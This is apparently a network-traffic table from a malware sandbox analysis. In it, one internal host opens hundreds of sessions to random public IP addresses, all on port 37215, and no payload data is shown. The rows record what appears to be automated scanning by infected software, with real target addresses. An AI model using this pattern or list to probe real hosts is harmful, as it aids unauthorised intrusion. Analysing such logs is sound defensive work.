                                                                            10526192.168.2.155437641.37.204.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10527192.168.2.154085641.74.237.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10528192.168.2.155781041.165.47.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10529192.168.2.156073841.212.147.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10530192.168.2.154905041.186.114.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10531192.168.2.155095441.17.5.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10532192.168.2.154156241.31.232.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10533192.168.2.153371041.219.45.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10534192.168.2.153816241.58.87.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10535192.168.2.153943241.77.168.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10536192.168.2.154651441.246.123.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10537192.168.2.155428441.148.23.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10538192.168.2.153597841.71.249.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10539192.168.2.154878241.44.16.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10540192.168.2.153680641.153.216.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10541192.168.2.154185241.214.249.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10542192.168.2.155127041.76.121.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10543192.168.2.153725241.246.53.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10544192.168.2.153917441.234.16.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10545192.168.2.154754041.160.36.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10546192.168.2.155618641.79.138.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10547192.168.2.154642241.39.73.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10548192.168.2.154279041.20.85.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10549192.168.2.155328641.207.31.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10550192.168.2.153508641.9.22.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10551192.168.2.153796841.208.95.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10552192.168.2.153585441.92.175.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10553192.168.2.155005441.178.162.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10554192.168.2.154189241.236.89.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10555192.168.2.154484641.11.23.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10556192.168.2.154436441.36.14.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10557192.168.2.155311641.93.79.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10558192.168.2.153793841.123.69.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10559192.168.2.153945841.45.162.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10560192.168.2.154967641.209.194.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10561192.168.2.154164841.50.146.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10562192.168.2.153391641.149.241.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10563192.168.2.154298441.128.2.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10564192.168.2.153699841.191.111.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10565192.168.2.155710641.77.234.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10566192.168.2.154103241.51.22.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10567192.168.2.155357241.178.32.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10568192.168.2.155229841.203.168.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10569192.168.2.156041041.26.168.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10570192.168.2.155287441.58.153.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10571192.168.2.154987441.66.36.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10572192.168.2.153626841.29.214.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10573192.168.2.154998641.22.34.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10574192.168.2.155761041.49.50.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10575192.168.2.154020841.128.191.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10576192.168.2.153467841.214.248.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10577192.168.2.156087641.110.68.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10578192.168.2.154699241.38.87.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10579192.168.2.154358441.75.181.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10580192.168.2.155127641.120.186.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10581192.168.2.153653241.53.84.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10582192.168.2.154322041.173.31.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10583192.168.2.155555641.235.184.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10584192.168.2.154019641.157.45.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10585192.168.2.155257641.27.68.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10586192.168.2.155692841.207.150.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10587192.168.2.155772041.103.35.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10588192.168.2.154701641.47.213.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10589192.168.2.156049841.108.223.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10590192.168.2.153661441.197.143.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10591192.168.2.155731441.229.208.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10592192.168.2.153720041.8.24.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10593192.168.2.153371641.97.60.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10594192.168.2.154746841.62.167.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10595192.168.2.155037841.181.192.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10596192.168.2.155322041.219.52.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10597192.168.2.153972041.144.5.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10598192.168.2.155136841.211.68.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10599192.168.2.153678641.167.214.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10600192.168.2.154015441.45.102.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10601192.168.2.153699441.79.126.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10602192.168.2.155526841.32.149.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10603192.168.2.155100241.24.246.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10604192.168.2.153845841.209.222.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10605192.168.2.155500841.19.218.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10606192.168.2.154131241.63.181.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10607192.168.2.153354041.206.62.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10608192.168.2.156095841.189.195.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10609192.168.2.155878041.107.205.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10610192.168.2.153288441.156.171.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10611192.168.2.156060041.224.246.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10612192.168.2.155174041.89.131.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10613192.168.2.155618441.42.20.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10614192.168.2.153806441.22.177.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10615192.168.2.154636641.134.21.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10616192.168.2.155691841.150.235.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10617192.168.2.155019441.78.145.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10618192.168.2.153454841.221.174.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10619192.168.2.154492241.124.120.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10620192.168.2.153607841.0.164.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10621192.168.2.155654441.54.34.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10622192.168.2.154347841.49.59.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10623192.168.2.155276041.206.219.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10624192.168.2.153777041.208.163.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10625192.168.2.155971041.76.144.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10626192.168.2.154376841.0.139.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10627192.168.2.154226641.59.161.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10628192.168.2.155605841.10.237.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10629192.168.2.153751841.178.225.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10630192.168.2.153919041.24.198.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10631192.168.2.155869441.100.92.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10632192.168.2.155654841.192.160.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10633192.168.2.153289641.160.91.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10634192.168.2.154918241.123.213.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10635192.168.2.154662641.1.213.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10636192.168.2.154846641.239.247.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10637192.168.2.154279241.220.206.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10638192.168.2.154198641.120.124.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10639192.168.2.155849841.165.187.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10640192.168.2.153396441.120.81.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10641192.168.2.154869241.14.5.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10642192.168.2.156014841.152.160.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10643192.168.2.155216041.242.16.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10644192.168.2.154022641.235.138.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10645192.168.2.154845641.179.161.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10646192.168.2.153394641.12.177.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10647192.168.2.153337841.171.182.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10648192.168.2.154323241.204.173.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10649192.168.2.155669641.131.213.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10650192.168.2.154154841.168.33.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10651192.168.2.155100241.142.118.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10652192.168.2.154890241.106.40.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10653192.168.2.155726441.92.96.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10654192.168.2.154501041.138.76.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10655192.168.2.154472041.122.179.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10656192.168.2.156065241.127.142.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10657192.168.2.154901241.31.56.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10658192.168.2.155958641.4.61.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10659192.168.2.156035441.58.155.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10660192.168.2.155173441.9.97.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10661192.168.2.155156841.100.124.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10662192.168.2.155306241.102.15.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10663192.168.2.155423041.71.15.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10664192.168.2.153614641.16.51.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10665192.168.2.153742841.30.237.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10666192.168.2.1546458197.100.104.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10667192.168.2.1533616197.113.0.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10668192.168.2.1533472197.227.242.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10669192.168.2.1543526197.2.6.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10670192.168.2.1544856197.19.55.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10671192.168.2.1538288197.61.231.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10672192.168.2.1547052197.72.198.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10673192.168.2.1549462197.154.201.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10674192.168.2.1542350197.13.142.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10675192.168.2.1554612197.50.219.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10676192.168.2.1534100197.249.3.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10677192.168.2.1559716197.5.133.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10678192.168.2.1544454197.238.246.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10679192.168.2.1538578197.202.114.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10680192.168.2.1533382197.142.197.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10681192.168.2.1539184197.119.37.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10682192.168.2.1534492197.118.194.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10683192.168.2.1543312197.86.63.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10684192.168.2.1556982197.123.220.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10685192.168.2.1554762197.184.14.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10686192.168.2.1538576197.238.138.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10687192.168.2.1555878197.142.150.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10688192.168.2.1560936197.123.9.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10689192.168.2.1556588197.107.200.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10690192.168.2.1537440197.222.246.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10691192.168.2.1543244197.166.47.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10692192.168.2.1542378197.93.34.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10693192.168.2.1541806197.153.48.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10694192.168.2.1540022197.180.143.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10695192.168.2.1551196197.43.225.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10696192.168.2.1542730197.43.102.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10697192.168.2.1545602197.25.233.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10698192.168.2.1550888197.164.60.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10699192.168.2.1542032197.27.115.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10700192.168.2.1557590197.140.179.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10701192.168.2.1545802197.145.74.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10702192.168.2.1558702197.223.83.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10703192.168.2.1560556197.82.50.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10704192.168.2.1536354197.107.115.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10705192.168.2.1556930197.199.162.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10706192.168.2.1552238197.201.186.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10707192.168.2.1556504197.116.173.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10708192.168.2.1560310197.11.187.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10709192.168.2.1543212197.219.7.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10710192.168.2.1542306197.208.253.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10711192.168.2.1535102197.96.77.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10712192.168.2.1534706197.59.54.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10713192.168.2.1546282197.136.200.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10714192.168.2.1533620197.111.204.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10715192.168.2.1546626197.112.1.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10716192.168.2.1550574197.128.28.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10717192.168.2.1555002197.97.107.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10718192.168.2.1546896197.161.156.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10719192.168.2.1551590197.228.72.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10720192.168.2.1555412197.193.140.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10721192.168.2.1545980197.155.56.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10722192.168.2.1541990197.13.212.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10723192.168.2.1554354197.54.82.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10724192.168.2.1554610197.188.147.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10725192.168.2.1537894197.39.211.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10726192.168.2.1541504197.170.46.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10727192.168.2.1557202197.180.197.23337215
                                                                            TimestampBytes transferredDirectionData


